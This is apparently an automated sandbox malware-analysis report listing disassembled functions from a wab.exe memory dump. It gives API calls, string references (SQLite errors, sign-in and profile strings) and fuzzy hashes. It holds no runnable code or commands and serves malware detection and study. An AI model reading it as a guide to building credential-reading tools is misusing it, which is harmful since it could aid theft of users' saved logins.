                                            • wcscpy.MSVCRT ref: 0040A6DB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                            • String ID: Unknown Error$netmsg.dll
                                            • API String ID: 2767993716-572158859
                                            • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                            • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                            • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                            • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                            APIs
                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                            • wcscpy.MSVCRT ref: 0040DAFB
                                            • wcscpy.MSVCRT ref: 0040DB0B
                                            • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                              • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: PrivateProfilewcscpy$AttributesFileString
                                            • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                            • API String ID: 3176057301-2039793938
                                            • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                            • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                            • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                            • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                            APIs
                                            Strings
                                            • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                            • cannot ATTACH database within transaction, xrefs: 0042F663
                                            • database is already attached, xrefs: 0042F721
                                            • unable to open database: %s, xrefs: 0042F84E
                                            • database %s is already in use, xrefs: 0042F6C5
                                            • too many attached databases - max %d, xrefs: 0042F64D
                                            • out of memory, xrefs: 0042F865
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memcpymemset
                                            • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                            • API String ID: 1297977491-2001300268
                                            • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                            • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                            • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                            • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                            APIs
                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                            • memcpy.MSVCRT ref: 0040EB80
                                            • memcpy.MSVCRT ref: 0040EB94
                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                              • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                            • String ID: ($d
                                            • API String ID: 1140211610-1915259565
                                            • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                            • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                            • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                            • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                            APIs
                                            • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                            • Sleep.KERNEL32(00000001), ref: 004178E9
                                            • GetLastError.KERNEL32 ref: 004178FB
                                            • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: File$ErrorLastLockSleepUnlock
                                            • String ID:
                                            • API String ID: 3015003838-0
                                            • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                            • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                            • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                            • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                            APIs
                                            • memset.MSVCRT ref: 00407E44
                                            • memset.MSVCRT ref: 00407E5B
                                            • _mbscpy.MSVCRT ref: 00407E7E
                                            • _mbscpy.MSVCRT ref: 00407ED7
                                            • _mbscpy.MSVCRT ref: 00407EEE
                                            • _mbscpy.MSVCRT ref: 00407F01
                                            • wcscpy.MSVCRT ref: 00407F10
                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                            • String ID:
                                            • API String ID: 59245283-0
                                            • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                            • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                            • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                            • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                            APIs
                                            • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                            • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                            • GetLastError.KERNEL32 ref: 0041855C
                                            • Sleep.KERNEL32(00000064), ref: 00418571
                                            • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                            • GetLastError.KERNEL32 ref: 0041858E
                                            • Sleep.KERNEL32(00000064), ref: 004185A3
                                            • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: File$AttributesDeleteErrorLastSleep$??3@
                                            • String ID:
                                            • API String ID: 3467550082-0
                                            • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                            • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                            • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                            • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                            • API String ID: 3510742995-3273207271
                                            • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                            • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                            • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                            • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                            APIs
                                            • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                            • memset.MSVCRT ref: 00413ADC
                                            • memset.MSVCRT ref: 00413AEC
                                              • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                            • memset.MSVCRT ref: 00413BD7
                                            • wcscpy.MSVCRT ref: 00413BF8
                                            • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memset$wcscpy$CloseHandleOpenProcess
                                            • String ID: 3A
                                            • API String ID: 3300951397-293699754
                                            • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                            • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                            • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                            • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                            • wcscpy.MSVCRT ref: 0040D1B5
                                              • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                              • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                            • wcslen.MSVCRT ref: 0040D1D3
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                            • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                            • memcpy.MSVCRT ref: 0040D24C
                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                            • String ID: strings
                                            • API String ID: 3166385802-3030018805
                                            • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                            • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                            • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                            • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                            APIs
                                            • memset.MSVCRT ref: 00411AF6
                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                            • wcsrchr.MSVCRT ref: 00411B14
                                            • wcscat.MSVCRT ref: 00411B2E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: FileModuleNamememsetwcscatwcsrchr
                                            • String ID: AE$.cfg$General$EA
                                            • API String ID: 776488737-1622828088
                                            • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                            • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                            • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                            • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                            APIs
                                            • memset.MSVCRT ref: 0040D8BD
                                            • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                            • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                            • memset.MSVCRT ref: 0040D906
                                            • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                            • _wcsicmp.MSVCRT ref: 0040D92F
                                              • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                              • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                            • String ID: sysdatetimepick32
                                            • API String ID: 1028950076-4169760276
                                            • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                            • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                            • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                            • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memcpy$memset
                                            • String ID: -journal$-wal
                                            • API String ID: 438689982-2894717839
                                            • Opcode ID: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                            • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                            • Opcode Fuzzy Hash: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                            • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                            APIs
                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                            • EndDialog.USER32(?,00000002), ref: 00405C83
                                            • EndDialog.USER32(?,00000001), ref: 00405C98
                                              • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                              • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                            • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                            • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Item$Dialog$MessageSend
                                            • String ID:
                                            • API String ID: 3975816621-0
                                            • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                            • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                            • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                            • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                            APIs
                                            • _wcsicmp.MSVCRT ref: 00444D09
                                            • _wcsicmp.MSVCRT ref: 00444D1E
                                            • _wcsicmp.MSVCRT ref: 00444D33
                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                              • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: _wcsicmp$wcslen$_memicmp
                                            • String ID: .save$http://$https://$log profile$signIn
                                            • API String ID: 1214746602-2708368587
                                            • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                            • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                            • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                            • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                            • String ID:
                                            • API String ID: 2313361498-0
                                            • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                            • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                            • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                            • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                            APIs
                                            • GetClientRect.USER32(?,?), ref: 00405F65
                                            • GetWindow.USER32(?,00000005), ref: 00405F7D
                                            • GetWindow.USER32(00000000), ref: 00405F80
                                              • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                            • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                            • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                            • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                            • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                            • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Window$ItemMessageRectSend$Client
                                            • String ID:
                                            • API String ID: 2047574939-0
                                            • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                            • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                            • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                            • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                            • String ID:
                                            • API String ID: 4218492932-0
                                            • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                            • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                            • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                            • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                            APIs
                                              • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                              • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                              • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                              • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                            • memcpy.MSVCRT ref: 0044A8BF
                                            • memcpy.MSVCRT ref: 0044A90C
                                            • memcpy.MSVCRT ref: 0044A988
                                              • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                              • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                            • memcpy.MSVCRT ref: 0044A9D8
                                            • memcpy.MSVCRT ref: 0044AA19
                                            • memcpy.MSVCRT ref: 0044AA4A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memcpy$memset
                                            • String ID: gj
                                            • API String ID: 438689982-4203073231
                                            • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                            • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                            • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                            • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                            • API String ID: 3510742995-2446657581
                                            • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                            • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                            • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                            • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                            APIs
                                            • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                            • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                            • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                            • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                            • memset.MSVCRT ref: 00405ABB
                                            • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                            • SetFocus.USER32(?), ref: 00405B76
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: MessageSend$FocusItemmemset
                                            • String ID:
                                            • API String ID: 4281309102-0
                                            • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                            • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                            • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                            • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: _snwprintfwcscat
                                            • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                            • API String ID: 384018552-4153097237
                                            • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                            • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                            • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                            • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ItemMenu$CountInfomemsetwcschr
                                            • String ID: 0$6
                                            • API String ID: 2029023288-3849865405
                                            • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                            • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                            • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                            • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                            APIs
                                              • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
